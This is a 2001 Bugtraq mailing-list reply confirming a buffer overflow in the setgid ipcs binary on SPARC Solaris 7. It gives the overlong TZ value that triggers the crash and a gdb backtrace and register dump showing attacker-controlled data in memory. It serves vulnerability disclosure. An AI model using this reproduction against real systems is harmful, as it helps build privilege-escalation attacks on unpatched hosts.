[20231] in bugtraq
Re: Solaris ipcs vulnerability
daemon@ATHENA.MIT.EDU (ARAI Yuu)
Mon Apr 16 15:04:47 2001
MIME-Version: 1.0
Content-Type: text/plain; charset="US-ASCII"
Content-Transfer-Encoding: 7bit
Message-ID: <20010417005214.0328.Y.ARAI@lac.co.jp>
Date: Tue, 17 Apr 2001 01:32:03 +0900
Reply-To: ARAI Yuu <y.arai@LAC.CO.JP>
From: ARAI Yuu <y.arai@LAC.CO.JP>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <EIEOJCKGEPCLJHGCNNOPGEBGCKAA.marc@eeye.com>
Hi,
I could reproduce same buffer overflow on SPARC Solaris 7.
/usr/bin/sparcv7/ipcs is installed as sgid "sys".
---
# TZ=`/usr/local/bin/perl -e 'print "A"x1107'`
# ./ipcs
Segmentation Fault (core dumped)
# /usr/local/bin/gdb ./ipcs core
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "sparc-sun-solaris2.7"...
(no debugging symbols found)...
Core was generated by `./ipcs'.
Program terminated with signal 11, Segmentation Fault.
Reading symbols from /usr/lib/libkvm.so.1...(no debugging symbols found)...
done.
Reading symbols from /usr/lib/libelf.so.1...(no debugging symbols found)...
done.
Reading symbols from /usr/lib/libc.so.1...(no debugging symbols found)...done.
Reading symbols from /usr/lib/libdl.so.1...(no debugging symbols found)...done.
Reading symbols from /usr/platform/SUNW,Ultra-2/lib/libc_psr.so.1...
(no debugging symbols found)...done.
#0 0xff2bd830 in nvmatch () from /usr/lib/libc.so.1
(gdb) bt
#0 0xff2bd830 in nvmatch () from /usr/lib/libc.so.1
#1 0xff2bd8dc in getenv () from /usr/lib/libc.so.1
#2 0xff2f6d8c in dcgettext_u () from /usr/lib/libc.so.1
#3 0xff2f6cb0 in gettext () from /usr/lib/libc.so.1
#4 0x112d8 in main ()
#5 0x10e8c in _start ()
Cannot access memory at address 0x41414179.
(gdb) info registers
g0 0x0 0
g1 0xff3107b0 -13563984
g2 0x0 0
g3 0x0 0
g4 0x0 0
g5 0x0 0
g6 0x0 0
g7 0x0 0
o0 0xff321ccc -13493044
o1 0xbef9a7 12515751
o2 0xff331f98 -13426792
o3 0xff31f296 -13503850
o4 0xff331f98 -13426792
o5 0xff2bd8a8 -13903704
sp 0xffbee758 -4266152
o7 0xff2bd8d4 -13903660
l0 0xff3a0148 -12975800
l1 0x45658 284248
l2 0xff286940 -14128832
l3 0xff2f6c80 -13669248
l4 0x0 0
l5 0x0 0
l6 0x0 0
l7 0x0 0
i0 0xff321ccc -13493044
i1 0x223b4 140212
i2 0xff331f98 -13426792
i3 0x0 0
i4 0xffbef8b4 -4261708
i5 0xf 15
fp 0xffbee7b8 -4266056
i7 0xff2f6d84 -13668988
y 0x0 0
psr 0xfe000000 -33554432 icc:----, pil:0, s:0, ps:0, et:0
, cwp:0
wim 0x0 0
tbr 0x0 0
pc 0xff2bd830 -13903824
npc 0xff2bd834 -13903820
fpsr 0x0 0 rd:N, tem:0, ns:0, ver:0, ftt:0, qne:0, fcc:=, a
exc:0, cexc:0
cpsr 0x0 0
---
It seems that "core" installation of Solaris 7 will not install
/usr/bin/sparcv7/ipcs.
Regards,
-----------------------------------------------
ARAI Yuu <y.arai@lac.co.jp>
Security Engineer / LAC Computer Security Laboratory
http://www.lac.co.jp/security/
